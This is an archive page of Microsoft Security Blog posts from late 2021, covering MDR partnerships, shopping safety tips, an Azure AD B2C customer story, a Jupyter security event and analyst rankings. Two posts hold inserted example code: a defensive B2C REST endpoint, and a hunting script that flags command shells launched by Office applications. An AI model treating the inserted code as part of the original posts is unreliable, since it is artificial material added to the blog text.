
Archive for the ‘cybersecurity’ Category

How Red Canary and Microsoft can help reduce your alert fatigue

November 29th, 2021 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

Security alert fatigue

Organizations often feel overwhelmed by the number of security alerts they receive. Frustrated by alert fatigue, these organizations want a deeper understanding of security threats and extended coverage to protect themselves. Enterprises typically maintain 70 security products from 35 different vendors,[1] and burnout from alert fatigue can lead to choices that put a company’s security at risk. Prospective customers have told us they mute security alerts or create rules to ignore or turn off alerts. Some security operations leaders have even said that if a security alert isn’t resolved within a week, it’s automatically deleted from the system.

Security alert fatigue happens when employees become desensitized to alerts and alarms from tools and technology because of their frequency. Since 2019, the number of security alerts has increased by 34 percent.[2] In fact, 44 percent of alerts go uninvestigated[1] because of the high volume and inadequate staff levels.

Red Canary is a security ally for customers

Security alerts lack the context customers need to determine which alerts are a serious threat and which are noise. They also wonder, “If we were attacked, how fast could we contain a security threat?” Security alerts don’t answer this question. That’s why Red Canary, a cybersecurity software as a service (SaaS) company that provides outcome-focused solutions for security operations teams, developed a security operations platform that powers their Managed Detection and Response (MDR) solutions. Red Canary MDR integrates with Microsoft Defender for Endpoint to help customers detect and respond to cybersecurity threats in their environment. Red Canary MDR + Microsoft Defender for Endpoint is a powerful combination for modern security operations teams to protect their organizations.

Founded in 2014, Red Canary is a security ally for customers and an extension of their security teams. Underpinning Red Canary’s MDR solution is its all-day security operations team. These detection engineers provide extended coverage for long-term customer peace of mind. Red Canary is continuously monitoring and reviewing every potential threat—even detections that appear outwardly benign are investigated.

Red Canary’s approach

When its MDR solution detects a security threat for one customer, a logic-based detection engine is strengthened and used to detect similar threats for other customers. Thousands of detectors—a number that is growing all the time—trigger investigations on anything suspicious that’s detected.

Red Canary’s solution supercharges the already powerful Microsoft Defender for Endpoint and also now supports Microsoft Defender for Identity, to help security operations teams protect on-premises identities, and Microsoft Azure Active Directory (Azure AD) Identity Protection, to protect identities and user accounts for Azure AD customers along with recently announced support for publishing confirmed detections into Microsoft Sentinel.

The Red Canary technology is only half the story. Customers also benefit from the deep threat detection expertise with detection engineers and incident handlers available around the clock, serving as an extension of a customer’s security team.

“We increase the confirmed detections and tune down the noise of security alerts.”—Cordell BaanHofman, General Manager, Red Canary + Microsoft Security at Red Canary

Red Canary by the numbers: 20,000 endpoints, 51 billion telemetry records, 69,886 tipoffs, 3,943 significant events, 74 detections, and 17 high-severity attacks.

Bridging the expertise and budget gap

Besides alert fatigue, companies also struggle with two other big challenges that restrict their ability to respond to cyberthreats: a lack of cybersecurity expertise and a limited budget. Many organizations lack the in-house expertise to review, investigate, and respond to Microsoft Defender for Endpoint security threats. Often, budget prevents them from hiring people with the expertise to operationalize Microsoft Defender for Endpoint or provide all-day coverage.

Red Canary supports these companies by giving them access to a team of cybersecurity experts and all-day coverage. It offers them an “easy button,” including customizable, automated incident response playbooks which enhance the pre-built automated incident response model of Microsoft Defender for Endpoint. Red Canary’s approach to threat detection continues to effectively protect its customer base from ransomware—like the Conti and REvil families that have been implicated in so many prominent attacks this year—and other high-impact threats.

The company analyzes alerts and raw telemetry through APIs connected to Microsoft Defender for Endpoint. Customers are only notified of confirmed threats—in the middle of the night if it’s a critical threat—and are provided with full threat context to quickly respond to stop it in its tracks. This response is achieved through a combination of automation and incident response experts to neutralize and remove the threat.

Flow chart from Microsoft Defender for Endpoint to Red Canary security operations center to customer security team and back.

After bringing in Red Canary, an IT security leader said they felt positively about their security posture for the first time in their 10-year information security career. A security analyst at a different company said the solution results in every detection being actionable and reliable. The security analyst explained: “Red Canary has taken what used to be a daily workload of hours and brought it down to minutes.”

MISA membership

Red Canary is aligned with Microsoft’s security strategy, particularly extended detection and response (XDR) and the Zero Trust approach. Since becoming an inaugural MDR partner in 2019, Red Canary earned IP co-sell incentive status and shared the virtual stage at Microsoft Ignite with Microsoft Corporate Vice President Rob Lefferts during his advanced attack security keynote.

Red Canary was one of the early members of the Microsoft Intelligent Security Association (MISA), joining in January 2019, and has participated in Microsoft webinars, blog posts, and marketing workshops—all made possible by MISA.

Learn more

One of the reasons that Red Canary and Microsoft’s relationship is so strong is the two companies share a similar ethos and objective. Red Canary’s mission is to empower organizations worldwide to make their greatest impact without fear of a cyberattack. Microsoft’s mission is to empower every person and every organization on the planet to achieve more. Reach out for a demonstration of Red Canary MDR + Microsoft Defender for Endpoint.

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

[1] 6 strategies to reduce cybersecurity alert fatigue in your SOC, Innocent Wafula, Microsoft, 17 February 2021.

[2] SOC Teams Burdened by Alert Fatigue Explore XDR, Joan Goodchild, Dark Reading, 14 May 2021.

The post How Red Canary and Microsoft can help reduce your alert fatigue appeared first on Microsoft Security Blog.

Stay safe online this holiday shopping season with tips from Microsoft

November 23rd, 2021 No comments

You may have already noticed this holiday shopping season feels different than those we’ve had before. Headlines about supply chain issues, worker shortages, costs rising—all while the pandemic continues to impact our lives. In my own inbox, I saw emails from brands touting Black Friday sales as early as October, an attempt to get ahead of the shipping delays that are widely expected to impact the holiday season. It’s no surprise that according to a recent Microsoft survey,[1] at least 63 percent of holiday shopping will be done online.

While we all grapple with these challenges and what they mean for our holiday traditions and celebrations, there is another group that is evaluating what it means for them—hackers. We know bad actors aim to understand the psychology of their victims—what tricks will they fall for and what vulnerabilities they have. And this year, there are some new areas around which we all need to be extra vigilant. Luckily, if we are aware and take simple steps to protect ourselves, we can all have peace of mind this season.

Shoppers’ concerns

According to our survey, price and availability are the two most important things shoppers are considering this year. We know price is always at the top of the list for most shoppers, but availability is a newer concern for most this year. If you’re already worried about getting gifts in time, you are certainly not alone—54 percent of people report they are worried about supply chain issues. And one in five are willing to go to a third-party seller, like auction or resale sites, to get their must-have holiday gifts.

Less than half of those surveyed say they consider the safety and security of their personal information when shopping online—while I’m glad to see that it’s in the consideration set, that means more than half aren’t even thinking about it. Luckily there are a few simple things that can set us all on a path to a safer shopping experience.

The holiday shopping season presents security challenges with 63 percent taking place online this year. You can learn how to protect yourself online this year on Microsoft Security's blog.

Fortify ahead of time

Before you start making purchases, look at the things you can do now to keep yourself more secure. We know that weak passwords are the entry point for most attacks—and there are a whopping 579 password attacks every second! Stop keeping track of your passwords and look to more secure alternatives.

  • Turn on multifactor authentication: If an account or service offers multifactor authentication (MFA), turn it on. If someone else tries to log into your account, you will be able to thwart the attempt when you are notified with a text, email, or other chosen method. MFA can block over 99 percent of password attacks.
  • Use free, trusted tools: Microsoft Edge offers several free features to keep you safe while shopping online. Should any of your saved logins become compromised, Password Monitor will notify you, allowing you to quickly change your password with the new one-click Easy Update feature in Edge. Password Generator automatically generates a strong, unique password suggestion each time you need one, as you create accounts to get all those great holiday deals.
  • Delete your password altogether: Where possible, remove your password completely and choose an alternate, more secure form of authentication. We make it easy to remove your password from your Microsoft account—not only is it more secure, you never need to worry about forgetting or changing a password. Learn how to go passwordless here: The passwordless future is here for your Microsoft account.

Don’t fall for too-good-to-be-true offers

With so many people worried about availability, we all need to be extra vigilant about scams that may prey on our desires to get the gifts our loved ones want. It can be easy to get tunnel vision when we see an ad for what we want with a “guaranteed delivery” offer. It might be tempting to go for it even if it’s a site we aren’t sure we can trust. But keep in mind, most offers that seem too good to be true are just that.

People are still falling victim to online scams like buying a fake digital gift card or making a purchase from what turned out to be a fake company. In fact, one in four have admitted to buying an item and receiving something that didn’t match the online description at all. Imagine thinking you’re getting the most popular toys of the holiday season only to get something that is more scary than merry.

And if you think that email offering extreme discounts or availability for an item that is sold out everywhere else seems a bit phishy, you may be right. Before you click, hover over any suspicious links to see if the web address matches what’s mentioned in the message. Look for any weird spellings, extra letters, or other telltale signs. When in doubt, go to the retailer website directly and see if the offer checks out. Learn more tips to spot phishing here.

These are just a few simple things you can do to help make your holiday shopping more secure, but the most important is #BeCyberSmart! Educate yourself, your family, and your friends about the threats out there and how to protect yourself. This helps us all be more vigilant and makes the world a little safer every day. To help you learn more about cybersecurity safety, visit our cybersecurity education resource center.

We’ll share more tips this holiday season—and be sure to check out what our colleagues at RiskIQ have to say about keeping e-commerce sites secure for holiday shopping.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Happy holidays!

[1] Data is from YouGov Omnibus among a sample of 2,010 adults in the US and was collected between 3 and 5 November 2021. The survey was carried out online and data have been weighted to be representative of all US adults (aged 18 plus).

The post Stay safe online this holiday shopping season with tips from Microsoft appeared first on Microsoft Security Blog.


MVP Health Care secures member portal access with Microsoft Azure Active Directory B2C

November 23rd, 2021 No comments

Hello! I’m Sue Bohn, Microsoft Vice President of Program Management for Identity and Network Access. In today’s Voice of the Customer blog post, Chief Technology Officer and Chief Information Security Officer David Swits of MVP Health Care shares how Microsoft Azure Active Directory B2C helped the organization modernize and simplify portal authentication.

MVP Health Care modernizes and simplifies the way members gain access to health plan information

As both Chief Technology Officer and the Chief Information Security Officer at MVP Health Care, I believe you must design your technology solutions with security as the foundation and then overlay the functionality. When building online portals to be accessible to four groups—individual members, employers, healthcare providers, and brokers—MVP Health Care prioritized security as much as ease of use and the user experience (UX). After all, stolen healthcare data is highly prized by cybercriminals, and we have a duty to protect members’ information.

MVP Health Care is a regional, not-for-profit health plan with 700,000 members and 1,700 employees in New York and Vermont. When I joined in 2018, the company was eight to nine years behind on technology. Our objective was to embark on digital transformation so the company could more easily and efficiently serve our constituents. As a Microsoft-first organization, that meant turning to Microsoft technology as we reinvented our infrastructure and replaced our traditional authentication methods with Azure Active Directory (Azure AD) External Identities for B2C user journeys.

The technology running previous portals was antiquated and cumbersome

Comparing healthcare plans can be confusing. We knew we had data that could make it easier. To do that, our portals needed to cut through complexity and deliver the right content for each constituent group.

The old portals—fueled by the IBM WebSphere Application Server—were cumbersome to use and support. MVP Health Care developers sometimes had to go through the back-end to fix an account. No back-end identity process existed to authenticate people who needed to access a portal, so anyone could create an identity for anyone.

Partner Edgile becomes an extension of MVP Health Care’s team

We considered augmenting what we already had with biometrics features, but those plugins didn’t mesh well with our infrastructure. In 2018, we brought on Edgile as a partner and shared our Zero Trust security approach—assuming breach and giving people the least privileged access possible. With extensive knowledge of Azure AD B2C, Edgile designed the identity infrastructure around the new portal and trained our team on best practices.

Edgile built B2C custom policies with user flows, such as seamless single sign-on and self-service password reset. Single sign-on lets people access all their apps after signing in once, while self-service password reset enables people to unlock or reset their passwords without the help desk. To preserve the user accounts from MVP’s previous identity provider, Edgile designed a migration path for users to move to Azure AD B2C the first time they signed in.

Microsoft provided feature previews to Edgile and worked with an MVP Health Care developer to port the UX designs into the HTML, JavaScript, and cascading style sheets (CSS) to refine the experience. A collection of Azure functions and a .NET Core RESTful web application from Edgile helped maintain data synchronization and the execution of complex operations.

“Edgile teamed up really well with MVP Health Care expertise in identity management including external identity management. We started first with a strategy that was followed by a successful quickstart/proof of concept that led to the broader implementation.”—Tarun Vazirani, Edgile Account Partner

Custom policies help create user journeys

MVP Health Care leveraged the custom policies, which are configuration files that define the behavior of MVP’s Azure AD B2C tenant user experience. While user flows are predefined in the Azure AD B2C portal for the most common identity tasks, a custom policy can be edited by an identity developer to be fully configurable and policy-driven. It orchestrates trust between entities in standard protocols, including OpenID Connect, OAuth, and SAML, and a few non-standard ones like REST API–based system-to-system claims exchanges. The framework creates user-friendly, white-labeled experiences to:

  • Federate with other identity providers.
  • Address first- and third-party multifactor authentication challenges.
  • Collect user input.
  • Integrate with external systems using REST API communication.

Each user journey is defined by a policy. One can build as many or as few policies as required for the best user experience.
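The list above mentions integrating with external systems over REST. Below is an added example, not MVP Health Care's or Edgile's code, of the kind of claims-exchange endpoint a custom policy calls during a user journey: B2C posts the claims collected so far, the endpoint validates them against an external store and returns either output claims or a user-facing error. The member directory, the claim names (memberId, email, planTier, legacyMemberId) and the x-api-key header are assumptions; the version/status/userMessage error body follows the shape custom-policy REST technical profiles expect, as I understand it.

```python
"""Added example: a minimal REST claims-exchange endpoint for an Azure AD B2C
custom policy. The member store, claim names and the x-api-key header are
assumptions made for this example."""
import hmac
import json
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# Placeholder shared secret; in production it comes from a key vault, and B2C
# reaches the endpoint only over HTTPS (a TLS-terminating front is assumed here).
API_KEY = "replace-with-a-secret-from-key-vault"

# Constructed stand-in for the legacy member store the policy checks against.
LEGACY_MEMBERS = {
    "MVP-000123": {"plan": "Gold", "email": "alice@example.com"},
    "MVP-000456": {"plan": "Silver", "email": "bob@example.com"},
}
MEMBER_ID_RE = re.compile(r"^MVP-\d{6}$")


def b2c_error(message, status=409):
    """Body B2C shows to the user when the technical profile reports a failure."""
    return status, {"version": "1.0.0", "status": status, "userMessage": message}


def handle_claims_exchange(headers, body):
    """Validate the input claims and return (http_status, json_body)."""
    presented = str(headers.get("x-api-key", "")).encode()
    if not hmac.compare_digest(presented, API_KEY.encode()):
        return 401, {"version": "1.0.0", "status": 401, "userMessage": "Unauthorized"}
    member_id = str(body.get("memberId", "")).strip().upper()
    email = str(body.get("email", "")).strip().lower()
    if not MEMBER_ID_RE.fullmatch(member_id):
        return b2c_error("Member ID must look like MVP-000000.")
    record = LEGACY_MEMBERS.get(member_id)
    # One message for both 'unknown ID' and 'wrong e-mail', so the endpoint
    # cannot be used to confirm which member IDs exist.
    if record is None or record["email"] != email:
        return b2c_error("We could not match that member ID and e-mail address.")
    # Output claims: the policy maps these JSON keys onto claims.
    return 200, {"legacyMemberId": member_id, "planTier": record["plan"]}


class ClaimsExchangeHandler(BaseHTTPRequestHandler):
    """Thin HTTP wrapper around handle_claims_exchange."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        try:
            body = json.loads(self.rfile.read(length) or b"{}")
        except ValueError:
            body = {}
        if not isinstance(body, dict):
            body = {}
        headers = {k.lower(): v for k, v in self.headers.items()}
        status, payload = handle_claims_exchange(headers, body)
        data = json.dumps(payload).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), ClaimsExchangeHandler).serve_forever()
```

Two choices matter for an endpoint that sits on an authentication path: the secret comparison is constant-time, and an unknown member ID and a wrong e-mail address produce the same message so the sign-up journey cannot be used to enumerate members.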


Figure 1: Microsoft’s identity experience framework.

A more unified and streamlined customer experience

Three portals have launched—with the provider portal expected to go live soon. Members appreciate the simpler, modern way they access their portal.

We now have modern authentication that integrates with modern technology. We can easily connect to Google, Facebook, and other verification methods. The experience is familiar for MVP Health Care’s constituents because it’s the same as the graphical interface they see elsewhere.

Together, all the features of Azure AD add huge value. Azure AD multifactor authentication and Conditional Access support Zero Trust’s baseline security. We’re audited on how well we protect confidential information. Multifactor authentication requires identity verification, such as entering a code sent to a phone. Conditional Access policies are if-then statements for how someone gains access.

On launch day, I tested the capabilities of Azure AD B2C and the new portals. I’ll never forget that feeling of knowing we’d chosen our technology wisely. It was slick. It was effective. It was fast. And it’s been an incredible asset for our organization ever since.

Voice of the Customer: Looking ahead

Many thanks to David for sharing MVP Health Care’s story. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers’ security and implementation insights more broadly. Bookmark the Microsoft Security blog so you don’t miss the next in this series!

To learn more about Microsoft Security solutions visit our website. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post MVP Health Care secures member portal access with Microsoft Azure Active Directory B2C appeared first on Microsoft Security Blog.

Join us at InfoSec Jupyterthon 2021

November 19th, 2021 No comments

We’re excited to invite our community of infosec analysts and engineers to the second annual InfoSec Jupyterthon taking place on December 2-3, 2021. This is an online event organized by our friends in the Open Threat Research Forge, together with folks from the Microsoft Threat Intelligence Center (MSTIC).

Although this is not a Microsoft event, our Microsoft Security teams are delighted to be involved with helping organize it and deliver talks and workshops. Registration is free and it will be streamed on YouTube Live both days from 10:30 AM to 8:00 PM Eastern Time.

Illustration of Jupyter, tools, and community

Figure 1. InfoSec Jupyterthon 2021 event image. This image was created by Scriberia for The Turing Way community and is used under a CC-BY licence. Zenodo record.

What is InfoSec Jupyterthon?

InfoSec Jupyterthon is a forum for information security analysts and engineers to share knowledge and experiences about using Jupyter notebooks in security hunting and investigation. Last year’s conference featured talks on a variety of topics, from integrating notebooks into your security operations (SOC) processes to using GPU-accelerated graphs, time series decomposition, and pandas statistics to detect and understand attacker patterns.

Since many of last year’s attendees identified themselves as Jupyter notebooks beginners, this year’s conference will feature a series of beginner and intermediate tutorials during the mornings, covering notebooks, data analysis with pandas, visualization and using MSTIC’s infosec Python package MSTICPy. The afternoons will host speakers on a variety of notebook and info security topics, including:

  • Automating notebook execution
  • Using notebooks with Apache Spark
  • Using notebooks in incident response

What is Jupyter and why is it relevant to infosec?

Jupyter notebooks are a hybrid environment that combine code, data analysis, and visualization in a single document. Jupyter is widely used by scientists and data analysts. Some of the characteristics that make Jupyter a great platform for more advanced threat investigations are:

  • Data agnostic – you can bring data from (almost) anywhere into your analysis
  • Centralization – you can combine code, formatted text, visuals in a single document
  • Flexible structure – it’s easy to add and remove sections as needed
  • Repeatable processes – you can save and run the same notebook on different inputs and/or criteria
  • Instant reporting – you can save a notebook as a PDF or HTML page

Screenshot of a sample Jupyter notebook process tree

Figure 2: A sample visualization of a process tree generated in a Jupyter notebook.

If you ever find yourself limited by your SIEM but don’t want to break into full-blown development mode, Jupyter notebooks could be what you’re looking for. You can read more about the benefits of using Jupyter in information security in this article.
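Figure 2 shows a process tree rendered in a notebook. The block below is an added example, not code from the post or from MSTICPy, of the analysis behind such a figure: it groups process-creation records by parent pid, renders the tree, and walks each process's lineage to find shells launched from an Office application, which is a common hunting question. It uses only the standard library so it runs without pandas; the telemetry records are constructed.

```python
"""Added example: process-tree construction and lineage checks of the kind a
hunting notebook performs. The process-creation records are constructed."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    pid: int
    ppid: int
    name: str
    cmdline: str


# Constructed telemetry, roughly what an EDR or Sysmon export looks like once loaded.
EVENTS = [
    ProcEvent("2021-11-19T09:00:00Z", 400, 1, "explorer.exe", "explorer.exe"),
    ProcEvent("2021-11-19T09:00:05Z", 500, 400, "OUTLOOK.EXE", "OUTLOOK.EXE"),
    ProcEvent("2021-11-19T09:01:10Z", 1200, 400, "WINWORD.EXE", 'WINWORD.EXE /n "invoice.docx"'),
    ProcEvent("2021-11-19T09:01:12Z", 1400, 500, "chrome.exe", "chrome.exe https://intranet.example/"),
    ProcEvent("2021-11-19T09:01:30Z", 1300, 1200, "cmd.exe", "cmd.exe /c dir"),
    ProcEvent("2021-11-19T09:01:31Z", 1310, 1300, "powershell.exe", "powershell.exe -NoProfile"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def build_tree(events):
    """Index events by pid and group children under their parent pid, oldest first."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        children[e.ppid].append(e)
    return by_pid, children


def ancestry(by_pid, pid):
    """Process names from the top-most known ancestor down to pid itself."""
    chain = []
    seen = set()  # guards against pid reuse creating a cycle
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def render_tree(events):
    """Indented text rendering, one line per process, roots first."""
    by_pid, children = build_tree(events)
    lines = []

    def walk(e, depth):
        lines.append(f"{'  ' * depth}{e.name} (pid {e.pid}) {e.cmdline}")
        for child in children[e.pid]:
            walk(child, depth + 1)

    roots = [e for e in sorted(events, key=lambda e: e.ts) if e.ppid not in by_pid]
    for root in roots:
        walk(root, 0)
    return lines


def office_spawned_shell(events):
    """Shells whose lineage passes through an Office application, as (pid, chain) pairs."""
    by_pid, _ = build_tree(events)
    hits = []
    for e in sorted(events, key=lambda e: e.ts):
        if e.name.lower() in SHELLS:
            chain = ancestry(by_pid, e.pid)
            if any(name.lower() in OFFICE_APPS for name in chain[:-1]):
                hits.append((e.pid, chain))
    return hits


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS)))
    for pid, chain in office_spawned_shell(EVENTS):
        print(f"pid {pid}: {' > '.join(chain)}")
```

In a notebook the same three steps would normally be a pandas groupby on ppid, a plotting call for the tree, and a filter on the lineage column; the logic is identical, and keeping it in plain functions is what makes a notebook re-runnable on a different day's export.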

Microsoft Sentinel includes a Jupyter notebooks feature that utilizes open APIs to power advanced investigations and hunting. Notebooks are also featured in several other Microsoft services such as Azure Data Studio and Azure Machine Learning. Google’s Colab and Amazon’s Sagemaker also have a big following, making Jupyter notebooks a popular tool with broad support and a variety of use cases.

We’re looking forward to seeing you at InfoSec Jupyterthon 2021, December 2-3, 2021 from 10:00 AM to 8:00 PM Eastern Time. To attend, make sure to register for the event. You will get an email confirming your registration as well as additional information about the agenda, schedule, and workshop instructions.

To stay up to date on Microsoft’s latest security research and threat intelligence insights, make sure to read our blog.


The post Join us at InfoSec Jupyterthon 2021 appeared first on Microsoft Security Blog.

Microsoft named a Leader in IDC MarketScape for Modern Endpoint Security for Enterprise and Small and Midsize Businesses

November 18th, 2021 No comments

The security stakes have never been higher and, consequently, the protection of endpoints as a key component of any extended detection and response (XDR) strategy has never been more critical—for organizations of all sizes. Microsoft is thrilled to be recognized as a Leader in IDC’s MarketScape reports for Modern Endpoint Security for both enterprise[1] and small and midsize businesses (SMB).[2]

The IDC MarketScape recognized Microsoft’s commitment to cross-platform support with Microsoft Defender for Endpoint, noting that “As telemetry is the rocket fuel for AI- and machine learning-infused endpoint security solutions, Microsoft’s breadth and volume are unequaled geographically and across customer segments (enterprise, small and midsize businesses, and consumer). With the support of macOS, iOS, and Android, Microsoft’s telemetry pool is expanding and diversifying. Microsoft’s expanded platform support also chips away at the long-standing advantage of endpoint security independent software vendors (ISVs).”

Microsoft’s vision for XDR was also cited as a differentiator, as Microsoft Defender for Endpoint is a key component of Microsoft 365 Defender, extending protection from devices to a single, integrated solution across all assets. “Microsoft’s strategic vantage point is more than its Windows operating system. Directory service of Active Directory, web browser of Microsoft Edge, and the ubiquitous business productivity apps of Office 365 provide Microsoft native visibility and control across common endpoint attack vectors. These security building blocks available through Microsoft licensing agreements (E3 and E5) and as standalone options have contributed to Microsoft’s market strength and momentum in modern endpoint security.”

Security for all

Everyone expects hackers to target big, lucrative targets. Modern endpoint security is a key component for any XDR strategy for enterprise security teams, along with identity, email, application, and cloud security protection. However, small businesses are also a popular target even if they are less prevalent in the headlines.

According to a recent SMB cybersecurity report, 55 percent of SMBs have experienced a cyberattack. Many SMB companies hold valuable information that can be exploited, such as customer and employee personal information, payment information, and more. Next-generation threats, like human-operated ransomware, are a danger to organizations of all sizes but are too rarely addressed by traditional endpoint protection platform (EPP) solutions.

As part of our commitment to security for all, Microsoft has renewed its pledge to bring enterprise security to SMBs and nonprofits, boosting cloud security programs and expanding intrusion prevention and detection tech to cover Amazon Web Services (AWS).

With the launch of Microsoft Defender for Business, Microsoft delivers capabilities such as antivirus, threat and vulnerability management, and endpoint detection and response (EDR), across a broad range of desktop and mobile platforms, including Windows, macOS, Android, and iOS.

Built on the foundation of Microsoft Defender for Endpoint, SMBs will be able to focus on addressing weaknesses that pose the highest risk to their environments, as well as to reduce attack surface with application control, ransomware mitigation, network and web protection, and firewall. The solution also provides next-generation protection (on devices and in the cloud) and automated investigation and remediation, while also allowing admins to automate workflows and integrate security data into existing solutions.

Defender for Business doesn’t require special security knowledge to install and use, and it comes with a simplified client configuration with recommended security policies enforced from the get-go.

“We need to have security for all, security that protects everything,” said Vasu Jakkal, Corporate Vice President for Security, Compliance, and Identity. “Security is a team sport, after all.”

Learn More

Read more about Microsoft Defender for Business, which offers enterprise-grade endpoint protection that’s cost-effective and easy to use—designed especially for businesses with up to 300 employees.

Readers seeking complete endpoint security can learn more about Microsoft Defender for Endpoint, Microsoft’s industry-leading, cloud-powered endpoint security solution offering vulnerability management, endpoint protection, EDR, and mobile threat defense. Sign up for a free trial today.

You can download the excerpts of the following reports for more details:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

We thank our customers and partners for being on this journey with us.


IDC MarketScape chart for Worldwide Modern Endpoint Security for Small and Midsize Businesses Vendor Assessment. Features Microsoft in top right hand corner under Leader.

IDC MarketScape chart for Worldwide Modern Endpoint Security for Enterprises Vendor Assessment. Features Microsoft in top right hand corner under Leaders.

IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of information and communication technology (ICT) suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market, and business execution in the short term. The Strategy score measures alignment of vendor strategies with customer requirements in a three to five-year timeframe. Vendor market share is represented by the size of the icons.

[1] IDC MarketScape: Worldwide Modern Endpoint Security for Enterprises 2021 Vendor Assessment, Doc #US48306021, November 2021.

[2] IDC MarketScape: Worldwide Modern Endpoint Security for Small and Midsize Businesses 2021 Vendor Assessment, Doc #48304721, November 2021.

The post Microsoft named a Leader in IDC MarketScape for Modern Endpoint Security for Enterprise and Small and Midsize Businesses appeared first on Microsoft Security Blog.

Microsoft unpacks comprehensive security at Gartner and Forrester virtual events

November 18th, 2021

Every day, Microsoft is committed to maintaining comprehensive security for all across our interconnected global community. With that purpose in mind, we recently sponsored the 2021 Gartner Security and Risk Summit and 2021 Forrester Security and Risk Forum, where we discussed ongoing changes in the security landscape. As a Leader in five Gartner® Magic Quadrant™ reports and eight Forrester Wave™ categories, our team was keen to share insights about new threats, the evolution of Zero Trust security, managing compliance, risk, and privacy, and building tomorrow’s talent.

Comprehensive security

Vasu Jakkal, Corporate Vice President of Microsoft Security, Compliance & Identity, speaking with Phil Montgomery, General Manager for Security Product Marketing GTM, at the 2021 Gartner Security and Risk Summit.

Vasu Jakkal, Corporate Vice President (CVP) of Microsoft Security, Compliance, and Identity, sat down with Phil Montgomery, General Manager for Security Product Marketing GTM, at the 2021 Gartner Security and Risk Summit for a wide-ranging fireside chat on the evolving state of cybersecurity. Phil started by addressing the elephant in the room—how the past 18 months have altered the security landscape in ways we’re still trying to understand.

“When the pandemic started, businesses had to become digital overnight,” Vasu points out. “With employees turning to personal devices to get the job done, that meant we had an exponential increase in the amount of digital attack surfaces. We saw an incredible increase in the sophistication and frequency of cyberattacks.” Vasu cites the attack on Colonial Pipeline as an example of how attacks have become more sophisticated and relentless in 2021. She also cites the phenomenon of cybercriminals expanding their operations by offering ransomware as a service. “Organizations are facing new economic challenges along with those brought by hybrid environments—multi-cloud and multi-platform,” she reiterates. “All these factors have come together to increase the complexity we face in cybersecurity.”

“You can’t secure a door and leave a window open. You have to think about your security posture as an interdependent whole—both external and internal threats.”—Vasu Jakkal, CVP of Microsoft Security, Compliance, and Identity

Eliminating complexity is one reason why Microsoft chose to integrate Microsoft Sentinel, our cloud-native SIEM + SOAR solution, and Microsoft Defender, our extended detection and response (XDR) tool. Integrating the two solutions simplifies detection and response by providing a bird’s-eye view of your digital estate, as well as enabling your security operations center (SOC) to investigate and resolve incidents at a granular level. “That kind of visibility and rapid response can really make a difference in the early stages of a ransomware attack,” Vasu stresses. “The reality today is if you’re connected, you’re vulnerable. The only way to protect a remote workforce is to have left-to-right and top-to-bottom security. That means security, compliance, identity, device management, and privacy are all interdependent.”

Beyond the technology, Vasu also points out: “The number one thing every security leader should be doing right now is building and practicing a plan with all essential members of your team. Do you have a great communications plan? Do you have a great response plan?” She also stressed the importance of training and empowering employees at every level of the organization to identify suspicious activity and escalate it.

Zero Trust comes of age in 2021

Nupur Goyal, Microsoft Group Product Marketing Manager for Identity Security & Zero Trust and Microsoft Corporate Vice President of Program Management Alex Simons talking at the 2021 Forrester Security & Risk Forum.

Earlier this month at the 2021 Forrester Security and Risk Forum, Microsoft CVP of Program Management Alex Simons also sat down for another fireside chat with Nupur Goyal, Microsoft Group Product Marketing Manager for Identity Security and Zero Trust. Alex also was struck by the rapid changes in enterprise security over the past 18 months. “If you think about the world we were in before [the pandemic],” he explains, “you were mostly protecting desktop PCs and laptops; most of your apps were on-premise. You didn’t have to worry about nation-state attackers. That’s why it’s important for enterprises to move away from the old perimeter-based security model to a Zero Trust approach.”

“The thing to remember about a Zero Trust approach, as the saying goes: you don’t have to eat the whole elephant at once. Just gradually expand multifactor authentication across your employees, beginning with those that have the access to the most important applications.”—Alex Simons, Microsoft CVP of Program Management

For some organizations, Zero Trust requires a big shift in thinking. It’s a mindset that assumes all activity, even by known users, could be an attempt to breach your systems. Alex cites attackers who are now targeting identities—both through users and the software itself—as a new threat to consider. “You really need a system that can look at what your users and their devices are doing,” he explains. “That includes all the software services that can access your resources. It really has to be a comprehensive approach. The workload identities, the ones that are your software, that’s a new thing. And you want to make sure you have a good plan in place for that.”

Alex recommends organizations begin by applying multifactor authentication to all privileged admin accounts. He also pointed out the importance of making sure that every device accessing your resources is well-managed. “Microsoft Endpoint Manager and Microsoft Defender for Endpoint help achieve that. You want to be sure every device is encrypted and protected with a PIN, but also you want each to be in a clean state from an antivirus standpoint.”

